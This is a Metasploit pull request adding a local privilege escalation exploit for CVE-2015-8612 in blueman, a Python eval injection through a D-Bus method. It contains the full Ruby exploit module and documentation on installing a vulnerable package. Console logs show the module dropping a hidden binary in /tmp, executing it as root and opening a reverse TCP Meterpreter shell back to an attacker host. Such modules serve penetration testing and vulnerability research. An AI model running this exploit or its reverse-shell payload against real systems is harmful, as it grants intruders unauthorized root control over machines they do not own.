### PR TITLE
Add blueman set_dhcp_handler D-Bus Privilege Escalation

### DIFF
--- a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md
@@ -27,6 +27,8 @@
   deb-src [check-valid-until=no] http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie main
   ```
 
+  Update the package sources with `apt-get -o Acquire::Check-Valid-Until=false update`
+
   The package can be installed with `apt-get install blueman`
 
 

--- a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md
@@ -1,0 +1,83 @@
+## Description
+
+  This module attempts to gain root privileges by exploiting a Python
+  code injection vulnerability in blueman versions prior to 2.0.3.
+
+  The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
+  `set_dhcp_handler` function which uses user input in a call to `eval`,
+  without sanitization, resulting in arbitrary code execution as root.
+
+  This module has been tested successfully with blueman version 1.23
+  on Debian 8 Jessie (x64).
+
+
+## Vulnerable Application
+
+  This module has been tested successfully with:
+
+  * blueman version 1.23 on Debian 8 Jessie (x64)
+
+  Old versions of the `blueman` package are available in [Debian snapshots](https://snapshot.debian.org/).
+
+  The following `/etc/apt/sources.list` configuration will allow a vulnerable
+  version of the `blueman` package to be installed:
+ 
+  ```
+  deb [check-valid-until=no] http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie main
+  deb-src [check-valid-until=no] http://snapshot.debian.org/archive/debian/20140827T042507Z/ jessie main
+  ```
+
+  The package can be installed with `apt-get install blueman`
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get a session
+  3. `use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc`
+  4. `set SESSION [SESSION]`
+  5. `check`
+  6. `run`
+  7. You should get a new *root* session
+
+
+## Options
+
+  **SESSION**
+
+  Which session to use, which can be viewed with `sessions`
+
+  **WritableDir**
+
+  A writable directory file system path. (default: `/tmp`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1
+  session => 1
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcpayload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188
+  lhost => 172.16.191.188
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run
+
+  [*] Started reverse TCP handler on 172.16.191.188:4444 
+  [*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ...
+  [*] Executing payload...
+  [*] Sending stage (861348 bytes) to 172.16.191.156
+  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.156:58863) at 2018-12-24 02:44:25 -0500
+  [+] Deleted /tmp/.DKJWL0TG7sm0M5
+
+  meterpreter > getuid
+  Server username: uid=0, gid=0, euid=0, egid=0
+  meterpreter > sysinfo
+  Computer     : debian-8-1-x64.local
+  OS           : Debian 8.1 (Linux 3.16.0-4-amd64)
+  Architecture : x64
+  BuildTuple   : x86_64-linux-musl
+  Meterpreter  : x64/linux
+  meterpreter > 
+  ```
+

--- a/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md
+++ b/documentation/modules/exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.md
@@ -58,7 +58,8 @@
   msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 
   msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1
   session => 1
-  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcpayload => linux/x64/meterpreter/reverse_tcp
+  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
+  payload => linux/x64/meterpreter/reverse_tcp
   msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188
   lhost => 172.16.191.188
   msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run

--- a/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb
+++ b/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb
@@ -105,7 +105,13 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'
 
-    CheckCode::Detected
+    res = execute_python('')
+    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
+      vprint_error 'Target is not vulnerable'
+      return CheckCode::Safe
+    end
+
+    CheckCode::Vulnerable
   end
 
   def execute_python(code)
@@ -119,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def exploit
-    unless check == CheckCode::Detected
+    unless check == CheckCode::Vulnerable
       unless datastore['ForceExploit']
         fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
       end
@@ -144,7 +150,11 @@ class MetasploitModule < Msf::Exploit::Local
     res = execute_python "os.system(\"#{payload_path}&\")"
     vprint_line res
 
-    if res.include? 'SyntaxError: invalid syntax'
+    unless res.include? 'eval("nc.set_dhcp_handler(%s)" % dhcp_handler)'
+      fail_with Failure::NotVulnerable, 'The target is not vulnerable'
+    end
+
+    if res.include? 'SyntaxError:'
       fail_with Failure::Unknown, 'Payload execution failed due to syntax error'
     end
   end

--- a/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb
+++ b/modules/exploits/linux/local/blueman_set_dhcp_handler_dbus_priv_esc.rb
@@ -1,0 +1,151 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'blueman set_dhcp_handler D-Bus Privilege Escalation',
+      'Description'    => %q{
+        This module attempts to gain root privileges by exploiting a Python
+        code injection vulnerability in blueman versions prior to 2.0.3.
+
+        The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
+        `set_dhcp_handler` function which uses user input in a call to `eval`,
+        without sanitization, resulting in arbitrary code execution as root.
+
+        This module has been tested successfully with blueman version 1.23
+        on Debian 8 Jessie (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'the grugq', # Discovery and exploit
+          'bcoles'     # Metasploit
+        ],
+      'DisclosureDate' => '2015-12-18',
+      'References'     =>
+        [
+          ['BID', '79688'],
+          ['CVE', '2015-8612'],
+          ['URL', 'https://twitter.com/thegrugq/status/677809527882813440'],
+          ['URL', 'https://github.com/blueman-project/blueman/issues/416'],
+          ['URL', 'https://www.openwall.com/lists/oss-security/2015/12/18/6'],
+          ['URL', 'https://www.debian.org/security/2015/dsa-3427'],
+          ['URL', 'https://bugs.mageia.org/show_bug.cgi?id=17361'],
+          ['URL', 'http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.421085']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           =>
+        [
+          ARCH_X86,
+          ARCH_X64,
+          ARCH_ARMLE,
+          ARCH_AARCH64,
+          ARCH_PPC,
+          ARCH_MIPSLE,
+          ARCH_MIPSBE
+        ],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'DefaultTarget'  => 0))
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    rm_f path
+    write_file path, data
+    register_file_for_cleanup path
+  end
+
+  def upload_and_chmodx(path, data)
+    upload path, data
+    chmod path
+  end
+
+  def dbus_send(dest:, type:, path:, interface:, contents:)
+    cmd_exec "dbus-send --system --print-reply --dest=#{dest} --type=#{type} #{path} #{interface} #{contents}"
+  end
+
+  def check
+    unless command_exists? 'dbus-send'
+      vprint_error 'dbus-send is not installed. Exploitation will fail.'
+      return CheckCode::Safe
+    end
+    vprint_good 'dbus-send is installed'
+
+    res = dbus_send(
+      dest: 'org.blueman.Mechanism',
+      type: 'method_call',
+      path: '/',
+      interface: 'org.freedesktop.DBus.Introspectable.Introspect',
+      contents: ''
+    )
+
+    unless res.include? 'EnableNetwork'
+      vprint_error 'org.blueman.Mechanism.EnableNetwork D-Bus interface is not available'
+      return CheckCode::Safe
+    end
+    vprint_good 'org.blueman.Mechanism.EnableNetwork D-Bus interface is available'
+
+    CheckCode::Detected
+  end
+
+  def execute_python(code)
+    dbus_send(
+      dest: 'org.blueman.Mechanism',
+      type: 'method_call',
+      path: '/',
+      interface: 'org.blueman.Mechanism.EnableNetwork',
+      contents: "'string:[]' 'string:[]' 'string:#{code}'"
+    )
+  end
+
+  def exploit
+    unless check == CheckCode::Detected
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 10..15}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+
+    print_status 'Executing payload...'
+    res = execute_python "os.system(\"#{payload_path}&\")"
+    vprint_line res
+
+    if res.include? 'SyntaxError: invalid syntax'
+      fail_with Failure::Unknown, 'Payload execution failed due to syntax error'
+    end
+  end
+end


### PR DESCRIPTION
:balloon:  :birthday: :gift: :birthday: Happy third birthday CVE-2015-8612 :birthday: :gift: :birthday: :balloon: 

Add blueman set_dhcp_handler D-Bus Privilege Escalation.

        This module attempts to gain root privileges by exploiting a Python
        code injection vulnerability in blueman versions prior to 2.0.3.

        The `org.blueman.Mechanism.EnableNetwork` D-Bus interface exposes the
        `set_dhcp_handler` function which uses user input in a call to `eval`,
        without sanitization, resulting in arbitrary code execution as root.

        This module has been tested successfully with blueman version 1.23
        on Debian 8 Jessie (x64).


### Output

  ```
  msf5 > use exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc 
  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set payload linux/x64/meterpreter/reverse_tcp
  payload => linux/x64/meterpreter/reverse_tcp
  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > set lhost 172.16.191.188
  lhost => 172.16.191.188
  msf5 exploit(linux/local/blueman_set_dhcp_handler_dbus_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.188:4444 
  [*] Writing '/tmp/.DKJWL0TG7sm0M5' (249 bytes) ...
  [*] Executing payload...
  [*] Sending stage (861348 bytes) to 172.16.191.156
  [*] Meterpreter session 2 opened (172.16.191.188:4444 -> 172.16.191.156:58863) at 2018-12-24 02:44:25 -0500
  [+] Deleted /tmp/.DKJWL0TG7sm0M5

  meterpreter > getuid
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : debian-8-1-x64.local
  OS           : Debian 8.1 (Linux 3.16.0-4-amd64)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 
  ```

### Notes

* Yes, specifying multiple `Arch` architectures like this is dumb. We should fix it. (outside of this PR). See: https://github.com/rapid7/metasploit-framework/pull/10994#discussion_r236593486

* No, it doesn't support `ARCH_PYTHON`. Not for any good reason.
